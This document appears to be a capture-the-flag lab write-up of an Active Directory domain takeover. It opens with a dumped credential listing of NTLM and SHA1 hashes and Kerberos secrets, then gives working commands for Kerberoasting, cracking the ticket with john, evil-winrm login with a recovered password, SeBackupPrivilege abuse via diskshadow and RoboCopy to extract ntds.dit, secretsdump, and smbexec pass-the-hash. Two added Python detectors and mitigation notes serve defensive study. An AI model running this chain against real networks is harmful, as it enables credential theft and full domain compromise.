* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 33470 (00000000:000082be)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XR-0923$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-0923$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
cloudap :

Got the flag.

Use this machine account's hash to query SPNs.

tianjing is found.

proxychains4 python3 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':a4f432e39e79dc4ad8b85854ed243f61' -dc-ip 172.22.14.11 -request-user tianjing

Crack the hash with john.

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Log in with it.

proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2
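From the defender's side, the GetUserSPNs.py step above lands on the DC as Security event 4769 with an RC4-HMAC (0x17) ticket for a user service account, requested here by a computer account. The following is an added detection example, not code from the original writeup; the 4769 records are constructed samples in a simplified dict form (field names follow the event's XML data names, the svc_sql account and IPs are made up).

```python
"""Added example: flag Kerberoasting-style TGS requests in Security event 4769.

A TGS request for a user (non-'$') service account with RC4-HMAC is the
classic Kerberoast signature; a computer account ('$') as the requester,
as with XR-0923$ driving GetUserSPNs.py above, strengthens the signal.
"""
from collections import defaultdict

RC4_HMAC = 0x17
ALLOWLIST = {"krbtgt"}  # krbtgt tickets are ordinary TGT traffic, not roastable SPNs

# Constructed sample 4769 records, not real DC output.
SAMPLE_4769 = [
    {"TargetUserName": "XR-0923$@XIAORANG.LAB", "ServiceName": "tianjing",
     "TicketEncryptionType": 0x17, "IpAddress": "172.22.14.46", "Status": 0x0},
    {"TargetUserName": "zhangshuai@XIAORANG.LAB", "ServiceName": "XR-DC$",
     "TicketEncryptionType": 0x12, "IpAddress": "172.22.14.46", "Status": 0x0},
    {"TargetUserName": "ocean@XIAORANG.LAB", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x17, "IpAddress": "172.22.14.7", "Status": 0x0},
    {"TargetUserName": "XR-0923$@XIAORANG.LAB", "ServiceName": "svc_sql",  # constructed name
     "TicketEncryptionType": 0x17, "IpAddress": "172.22.14.46", "Status": 0x0},
]


def is_kerberoast_candidate(ev):
    """RC4 service ticket, successfully issued, for a user SPN account."""
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() in ALLOWLIST:
        return False
    return ev["TicketEncryptionType"] == RC4_HMAC and ev["Status"] == 0


def kerberoast_findings(events):
    """Return {requester: sorted list of SPN accounts it requested RC4 tickets for}."""
    by_requester = defaultdict(set)
    for ev in events:
        if is_kerberoast_candidate(ev):
            by_requester[ev["TargetUserName"]].add(ev["ServiceName"])
    return {req: sorted(svcs) for req, svcs in by_requester.items()}


def machine_account_requesters(findings):
    """Requesters that are computer accounts: a host requesting user-SPN
    tickets is rarely legitimate and deserves an immediate look."""
    return sorted(req for req in findings if req.split("@")[0].endswith("$"))


if __name__ == "__main__":
    found = kerberoast_findings(SAMPLE_4769)
    print(found)                              # {'XR-0923$@XIAORANG.LAB': ['svc_sql', 'tianjing']}
    print(machine_account_requesters(found))  # ['XR-0923$@XIAORANG.LAB']
```

The mitigation the detection points at is the same as always: long random passwords (or gMSAs) for SPN-bearing accounts and AES-only Kerberos, so an RC4 request becomes an anomaly in itself.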

The account has SeBackupPrivilege.

Copying SAM with SeBackupPrivilege

First create a diskshadow script file locally, here named raj.dsh, with the following content:

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

Next, run unix2dos on the dsh file so its encoding and line endings are Windows-compatible:

unix2dos raj.dsh

Create a test folder under C:/, cd into it, and upload raj.dsh there:

mkdir test
cd test
upload raj.dsh

Finally, create the volume shadow copy:

diskshadow /s raj.dsh

Then copy ntds.dit out of the shadow copy into the current directory:

RoboCopy /b z:\windows\ntds . ntds.dit

Then back up the SYSTEM registry hive and download it locally:

reg save hklm\system system
download system

Then decrypt it with impacket-secretsdump:

impacket-secretsdump -ntds ntds.dit -system system local
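Every step of the chain above runs as an ordinary process on the DC (diskshadow with a script file, RoboCopy /b against ntds.dit, reg save of the SYSTEM hive), so it is visible in Sysmon event 1 or Security 4688 command lines. The following is an added detection example, not code from the original writeup; the process records are constructed samples and the `user`/`cmd` field names are assumptions.

```python
"""Added example: score process-creation command lines for the
SeBackupPrivilege -> diskshadow -> RoboCopy /b -> reg save chain.

A lone 'robocopy /b' can be a real backup job, so the detector reports a
user only once it has hit at least min_stages distinct stages.
"""
import re

# (label, regex applied to the lowercased command line)
RULES = [
    ("diskshadow_script", re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\s")),
    ("robocopy_backup_ntds", re.compile(r"\brobocopy(\.exe)?\b.*\s/b\b.*ntds\.dit")),
    ("reg_save_hive", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(system|sam|security)\b")),
    ("vssadmin_shadow", re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow")),
]

# Constructed sample process-creation records, not real log output.
SAMPLE_EVENTS = [
    {"user": "XIAORANG\\tianjing", "cmd": r"diskshadow /s C:\test\raj.dsh"},
    {"user": "XIAORANG\\tianjing", "cmd": r"RoboCopy /b z:\windows\ntds . ntds.dit"},
    {"user": "XIAORANG\\tianjing", "cmd": r"reg save hklm\system system"},
    {"user": "XIAORANG\\backupsvc", "cmd": r"robocopy /mir D:\data E:\bak"},  # benign
]


def match_rules(cmd):
    """Labels of every rule the command line matches (case-insensitive)."""
    low = cmd.lower()
    return [label for label, rx in RULES if rx.search(low)]


def chain_findings(events, min_stages=2):
    """Return {user: sorted stage labels} for users that hit >= min_stages
    distinct stages; single hits are left for lower-priority review."""
    per_user = {}
    for ev in events:
        for label in match_rules(ev["cmd"]):
            per_user.setdefault(ev["user"], set()).add(label)
    return {u: sorted(s) for u, s in per_user.items() if len(s) >= min_stages}


if __name__ == "__main__":
    print(chain_findings(SAMPLE_EVENTS))
    # {'XIAORANG\\tianjing': ['diskshadow_script', 'reg_save_hive', 'robocopy_backup_ntds']}
```

Correlating the hit with event 4672 (special privileges assigned to a new logon) showing SeBackupPrivilege for an account that is not an expected backup operator closes the loop; the fix is to keep Backup Operators membership to real backup identities.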

With the domain admin's hash, do pass-the-hash:

proxychains4 python3 smbexec.py -hashes :70c39b547b7d8adec35ad7c09fb1d277 Administrator@172.22.14.11